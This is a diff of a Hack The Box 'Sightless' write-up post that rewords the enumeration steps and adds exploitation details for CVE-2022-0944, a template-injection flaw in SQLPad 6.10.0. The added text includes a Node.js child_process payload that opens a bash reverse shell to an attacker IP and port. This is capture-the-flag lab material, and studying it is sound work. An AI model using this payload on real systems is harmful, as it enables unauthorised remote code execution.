samh4cks/samh4cks.github.io/_posts/2024-12-01-sightless-hackthebox.md

 000006462:   301        7 L      12 W       178 Ch   "icones"
 ```

-I haven't found anything interesting while directory fuzzing.
-Let's browse the website and try to find some information.
+Unfortunately, no interesting directories were discovered during fuzzing.
+Let’s browse the website to look for valuable information.

-While browsing the website, I have found one subdomain `sqlpad.sightless.htb`.
+While navigating the site, I discovered a subdomain, `sqlpad.sightless.htb`.

 ![Subdomain Browser View](/assets/images/writeups/Sightless-HTB/2.png)

-Let's browse the SQLPad website and enumerate it to run SQL queries or find something interesting.
+Let's browse the `SQLPad` website and enumerate it to run SQL queries or find something interesting.

 ![SQLPad Version](/assets/images/writeups/Sightless-HTB/3.png)

-I have found `SQLPad` version as `6.10.0`.
-Let's browse Google and try to find exploit for this SQLPad version if any exists.

-SQLPad version 6.10.0 is vulnerable to [__CVE-2022-0944__](https://github.com/0xRoqeeb/sqlpad-rce-exploit-CVE-2022-0944).
+The SQLPad version identified was `6.10.0`.
+After researching, I found that this version is vulnerable to [__CVE-2022-0944__](https://github.com/0xRoqeeb/sqlpad-rce-exploit-CVE-2022-0944).

 ## Exploitation

-`CVE-2022-0944` - Template injection in connection test endpoint leads to RCE in GitHub repository sqlpad/sqlpad prior to 6.10.1.
+`CVE-2022-0944` - This vulnerability allows for template injection via the `/api/test-connection` endpoint in SQLPad versions before 6.10.1, resulting in remote code execution (RCE).

+As SQLPad is built with Node.js, I used the `child_process` module to execute arbitrary commands.

+Payload - `process.mainModule.require('child_process').exec('/bin/bash -c "bash -i >& /dev/tcp/{args.attacker_ip}/{args.attacker_port} 0>&1"');`

+I utilized the Python-based [__SQLPad RCE Exploit__](https://github.com/0xRoqeeb/sqlpad-rce-exploit-CVE-2022-0944) for this.

 Let's use this exploit to perform template injection in new SQLPad query.